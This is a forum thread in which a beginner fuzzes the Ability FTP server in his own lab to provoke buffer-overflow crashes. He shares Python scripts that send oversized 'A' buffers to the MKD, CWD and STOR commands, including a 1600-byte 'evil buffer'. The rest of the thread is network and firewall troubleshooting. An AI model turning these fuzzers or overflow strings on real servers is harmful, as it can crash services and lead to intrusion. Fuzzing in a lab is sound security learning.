[SOLVED] Fuzzing - Buffer Overflow - Ability Server

lee_can · 05-29-2011, 01:39 PM

Hi,
i am trying to send malformed string into ability ftp server in order to have some unexpected crashes.

i login in into the ability ftp server on my window 7.
On my virtual machine,i am working on a backtrack 4, i tried to send some string to have some unexpected crashes, but i couldn't success.
here is the code:

PHP Code:



#!/usr/bin/python 
import socket 
 
# Create an array of buffers, from 20 to 2000, with increments of 20. 
buffer=["A"] 
counter=20 
while len(buffer) <= 100: 
        buffer.append("A"*counter) 
        counter=counter+20 
 
# Define the FTP commands to be fuzzed 
commands=["MKD","CWD","STOR"] 
 
# Run the fuzzing loop 
for command in commands: 
        for string in buffer: 
                print "Fuzzing" + command + ":" +str(len(string)) 
                s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
                connect=s.connect(('192.168.8.23',21)) 
                s.recv(1024) 
                s.send('USER_TEST ftp\r\n') 
                s.recv(1024) 
                s.send('12345 ftp\r\n') 
                s.recv(1024) 
                s.send(command + ' ' + string + '\r\n') 
                s.recv(1024) 
                s.send('QUIT\r\n') 
                s.close()

I just want to login to the ftp, with username: "USER_TEST" and pass: "12345"on my window 7 machine (ip 192.168.8.23), but it gave me this:

Quote:

root@bt:~/Files/Script/bufferflow# ./simple-fuzzer.py
FuzzingMKD:1
Traceback (most recent call last):
File "./simple-fuzzer.py", line 19, in <module>
connect=s.connect(('192.168.8.23',21))
File "<string>", line 1, in connect
socket.error: (110, 'Connection timed out')

an anyone advise please?
Regards

kbp · 05-29-2011, 05:51 PM

Is there some reason you can't use ftplib rather than manually set up a socket/connection ? .. at least test it with ftplib first to make sure it works.

lee_can · 05-29-2011, 09:59 PM

Quote:

Originally Posted by kbp

Is there some reason you can't use ftplib rather than manually set up a socket/connection ? .. at least test it with ftplib first to make sure it works.

Hi kbp,
ftplib didnt works with me too, it gave me cannot connect to server, when i go back home, i will show the script.

Regards

kbp · 05-30-2011, 06:29 AM

Then maybe it's a connection/firewall problem, please check basic connectivity (ping) and ensure any firewalls are allowing ftp traffic. It's easiest to turn them off considering this is just a test host.

lee_can · 05-30-2011, 12:02 PM

Quote:

Originally Posted by kbp

Is there some reason you can't use ftplib rather than manually set up a socket/connection ? .. at least test it with ftplib first to make sure it works.

appreciate your help kbp
regarding the ftplib,i tried a script from this website.
here is the script:

PHP Code:



import ftplib
from ftplib import FTP

buffer = '\x41'*1600
try:
   # Edit the IP, Username and Password.
   ftp = FTP('192.168.8.23')
   ftp.login('USER_TEST','12345')
   print "\nEvil Buffer sent..."
except:
   print "\nCould not Connect to FTP Server."
try:
   ftp.transfercmd("STOR " + buffer)
except:
   print "\nDone."

So, when i tried to run this script, i got this error:

Code:

root@bt: ./test.py
./test.py: line 4: buffer: command not found
./test.py: line 5: try:: command not found
./test.py: line 7: syntax error near unexpected token `('
./test.py: line 7: `   ftp = FTP('192.168.8.23') '

I am still new in this linux system
thanks in advance for your help.

kbp · 05-31-2011, 05:32 PM

You'll need to tell the OS which interpreter to execute the script with, please add :-

Code:

#!/usr/bin/env python

as the first line in your script

lee_can · 06-01-2011, 11:56 AM

Quote:

Originally Posted by kbp

You'll need to tell the OS which interpreter to execute the script with, please add :-

Code:

#!/usr/bin/env python

as the first line in your script

thanks kbp for yout help, well i add the above line, but still cannot connect:

oot@bt:~/Files/Script/bufferflow# ./test.py

Could not Connect to FTP Server.

Done.

i dont know why

kbp · 06-01-2011, 05:48 PM

So you still have a connection problem ... lets start at the start, please run these tests in order and post the results:-

From the linux machine:
- ping 192.168.8.23
- telnet 192.168.8.23 21

From the Windows machine:
- ping <ip_of_linux_machine>
- netstat -a -p tcp | findstr 21

lee_can · 06-02-2011, 11:12 AM

Hi kbp,
please find below the output:

Code:

root@bt:~# ping 192.168.8.23
PING 192.168.8.23 (192.168.8.23) 56(84) bytes of data.
64 bytes from 192.168.8.23: icmp_seq=1 ttl=128 time=0.825 ms
64 bytes from 192.168.8.23: icmp_seq=2 ttl=128 time=1.50 ms
64 bytes from 192.168.8.23: icmp_seq=3 ttl=128 time=5.39 ms
64 bytes from 192.168.8.23: icmp_seq=4 ttl=128 time=0.456 ms
^Z
[2]+  Stopped                 ping 192.168.8.23
root@bt:~#

Code:

root@bt:~# telnet 192.168.8.23 21
Trying 192.168.8.23...
telnet: Unable to connect to remote host: Connection timed out
root@bt:~#

Code:

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\W1>ping 192.168.8.36

Pinging 192.168.8.36 with 32 bytes of data:
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64
Reply from 192.168.8.36: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.8.36:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Code:

C:\Users\W1>netstat -a -p tcp | findstr 21
  TCP    0.0.0.0:21             W1-PC:0                LISTENING

C:\Users\W1>

I really appreciate your help.
Regards

kbp · 06-02-2011, 08:35 PM

It's probably the Windows Firewall .. do you need help to modify it ?

lee_can · 06-02-2011, 09:58 PM

Quote:

Originally Posted by kbp

It's probably the Windows Firewall .. do you need help to modify it ?

If you dont mind, as still i am newbie in this world and trying to learn.

kbp · 06-03-2011, 08:41 AM

In the "Control Panel" you'll find "Windows Firewall" - open it. There should be checkboxes that say "notify me when windows firewall blocks a new program" - ensure they're checked and the "block all incoming connections .. " ones are not.

The next time you attempt to connect to the ftp server a message should appear asking if you want to allow the access - say yes.

lee_can · 06-03-2011, 12:39 PM

Quote:

Originally Posted by kbp

In the "Control Panel" you'll find "Windows Firewall" - open it. There should be checkboxes that say "notify me when windows firewall blocks a new program" - ensure they're checked and the "block all incoming connections .. " ones are not.

The next time you attempt to connect to the ftp server a message should appear asking if you want to allow the access - say yes.

I dont know how to thank you kbp, really thank you very much.
every thing is fine now, i can continue now ...
Best regards